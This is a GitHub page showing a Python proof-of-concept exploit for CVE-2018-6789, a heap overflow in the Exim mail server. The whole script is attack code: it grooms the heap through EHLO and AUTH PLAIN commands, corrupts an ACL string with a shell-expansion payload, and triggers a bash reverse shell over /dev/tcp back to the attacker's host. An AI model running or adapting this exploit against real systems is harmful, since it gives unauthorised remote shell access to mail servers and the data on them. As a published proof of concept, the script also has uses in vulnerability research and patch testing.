forked from straightblast/My-PoC-Exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2018-6789.py
142 lines (98 loc) · 3.65 KB
/
CVE-2018-6789.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
#!/usr/bin/python
import sys
import time
import socket
import struct
s = None
f = None
def logo():
print
print " CVE-2018-6789 Poc Exploit"
print "@straight_blast ; straight426@gmail.com"
print
def connect(host, port):
global s
global f
s = socket.create_connection((host,port))
f = s.makefile('rw', bufsize=0)
def p(v):
return struct.pack("<Q", v)
def readuntil(delim='\n', debug = False):
data = ''
while not data.endswith(delim):
data += f.read(1)
if debug:
print data
return data
def write(data):
f.write(data + "\n")
def ehlo(v):
write("EHLO " + v)
readuntil('HELP')
def unrec(v):
write(v)
readuntil('command')
def auth_plain(v,s = None):
encode = v.encode('base64').replace('\n','').replace('=','')
if s and len(s) > 0:
encode = encode + s
write("AUTH PLAIN " + encode)
readuntil('data')
def one_byte_overwrite():
v = "C" * 8200
encode = v.encode('base64').replace('\n','').replace('=','')
encode = encode[:-1] + "PE"
write("AUTH PLAIN " + encode)
readuntil('data')
def exploit(remote_host, remote_port, local_host, local_port):
connect(remote_host, remote_port)
print "[0] connected to target -> " + remote_host + ":" + str(remote_port)
time.sleep(0.5)
ehlo("A" * 8000)
ehlo("B" * 16)
print "[1] finished grooming heap with 0x6060 block space"
unrec("\xff" * 2000)
ehlo("D" * 8200)
one_byte_overwrite()
print "[2] triggerd 1 byte overwrite vulnerability to extend the chunk size from 0x2021 to 0x20f1"
fake_header = p(0)
fake_header += p(0x1f51)
auth_plain("E" * 176 + fake_header + "E" * (8200-176-len(fake_header)))
print "[3] patched following store block with fake header so extended chunk can be freed"
ehlo("F" * 16)
print "[4] freed extended store block"
unrec("\xff" * 2000) #filler against freed block
unrec("\xff" * 2000) #filler against freed block
fake_header = p(0x4110)
fake_header += p(0x1f50)
auth_plain("G" * 176 + fake_header + "G" * (8200-176-len(fake_header)))
print "[5] patched store block with fake header so extended chunk can be malloced"
#acl_store_block_partial_address = "\x80\xa4\x6e"
acl_store_block_partial_address = "\xe0\xc8\x6c"
auth_plain("H" * 8200 + p(0x2021) + acl_store_block_partial_address, "X")
print "[6] finished using extend chunk to overwrite the overlapping store block's next pointer to an acl store block address"
ehlo("I" * 16)
print "[7] triggered smtp_reset_3(); with EHLO"
# 288 is for github build
# 1000 is for debian build
#acl_smtp_rcpt_offset = 288
acl_smtp_rcpt_offset = 1000-16
cmd = "/bin/bash -c \"/bin/bash -i >& /dev/tcp/" + local_address + "/" + str(local_port) + " 0>&1\""
cmd_expansion_string = "${run{" + cmd + "}}\0"
auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "\0" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string)))
print "[8] malloced acl store block and overwrite the content of acl_smtp_rcpt with shell expression"
write("MAIL FROM:<straightblast426@gmail.com>") ; readuntil()
write("RCPT TO:<j00_g0t@pwned.com>")
print "[9] triggered RCPT TO which executes shell expression ... enjoy your shell!"
print
if __name__ == '__main__':
logo()
if len(sys.argv) < 5:
print "Usage: ./exploit <remote_address> <remote_port> <local_address> <local_port>\n"
exit()
remote_address = sys.argv[1]
remote_port = int(sys.argv[2])
local_address = sys.argv[3]
local_port = int(sys.argv[4])
#print remote_address, remote_port, local_address, local_port
exploit(remote_address, remote_port, local_address, local_port)